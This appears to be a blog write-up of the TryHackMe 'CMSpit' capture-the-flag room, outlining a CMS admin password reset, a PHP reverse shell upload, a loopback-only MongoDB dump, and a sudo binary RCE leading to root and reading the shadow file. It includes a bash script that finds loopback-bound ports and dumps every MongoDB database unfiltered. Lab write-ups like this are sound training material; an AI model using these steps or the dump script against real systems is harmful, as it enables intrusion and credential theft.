CMSpit
August 4, 2021 • 287 words
CMSpit - THM
After the initial scan there are two open ports. Brute forcing the first would be unreasonable without even looking at the other one, so start with the web server. The login page shows the name of the CMS right up front. Armed with that name, ask Google and sooner rather than later you should encounter this. Follow what it says to the letter and in no time you can change the admin's password, which means you can now log into the administrative console.
Keep reading: the same article also tells you that the file upload is not guarded against malicious files, so you can simply upload a PHP reverse shell and you have a shell on the target.
Following the room's instructions, check the listening ports on the box (netstat does wonders, nothing fancy needed). There is a listening port that was not reachable from the outside: what is it? Google again, and it turns out to be a MongoDB instance running on the compromised server. Use the mongo shell to interact with it and you can retrieve both a flag and a password.
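As an added example (not from the original post), here is how I would automate the two steps above: pick out the listeners that are bound to loopback only, which is exactly what an external scan cannot see, and then dump every database and collection once the mongo shell is available. The netstat output is constructed for the example, not taken from the target; the host, port and function names are mine.

```bash
#!/usr/bin/env bash
# Constructed 'netstat -tlnp' output for the example (not from the target machine)
NETSTAT_SAMPLE='Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:27017         0.0.0.0:*               LISTEN      -
tcp6       0      0 :::22                   :::*                    LISTEN      -'

# Print the TCP ports in LISTEN state whose local address is loopback only
# (127.0.0.1 or ::1). Those are the services an external port scan misses.
loopback_only_ports() {
  printf '%s\n' "$1" | awk '$1 ~ /^tcp/ && $6 == "LISTEN" {
      n = split($4, a, ":"); port = a[n];
      # everything before the last ":" is the bind address (handles IPv6 too)
      host = substr($4, 1, length($4) - length(port) - 1);
      if (host == "127.0.0.1" || host == "::1") print port }'
}

# Enumerate a MongoDB instance with the legacy mongo shell: list every database,
# every collection in it, and print all documents. Needs 'mongo' on PATH and a
# live server, so it is not exercised by the offline sample above.
mongo_enum() {
  local host="${1:-127.0.0.1}" port="${2:-27017}"
  mongo --quiet --host "$host" --port "$port" --eval '
    db.adminCommand({ listDatabases: 1 }).databases.forEach(function (d) {
      var cur = db.getSiblingDB(d.name);
      cur.getCollectionNames().forEach(function (c) {
        print("== " + d.name + "." + c + " ==");
        cur.getCollection(c).find().forEach(printjson);
      });
    });'
}

# Usage on the compromised host:
#   loopback_only_ports "$(netstat -tlnp 2>/dev/null)"
#   mongo_enum 127.0.0.1 27017
```

Run the first function against the real `netstat -tlnp` output and diff the result against the external nmap scan; anything that shows up only here is a candidate for local enumeration. The mongo dump is deliberately unfiltered so that credentials or flags stored in an unexpected collection are not skipped.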
Using this password, move laterally to the only real user on the machine. A quick look at the sudo configuration shows a binary that this user can run as root without any further authentication. That binary suffers from a fairly recent RCE vulnerability, and a PoC is available here to help you build the payload. Start a reverse shell, read shadow and crack the hashes, or just read root's flag: either way the machine is done and you can move on to your next target. Merry hacking!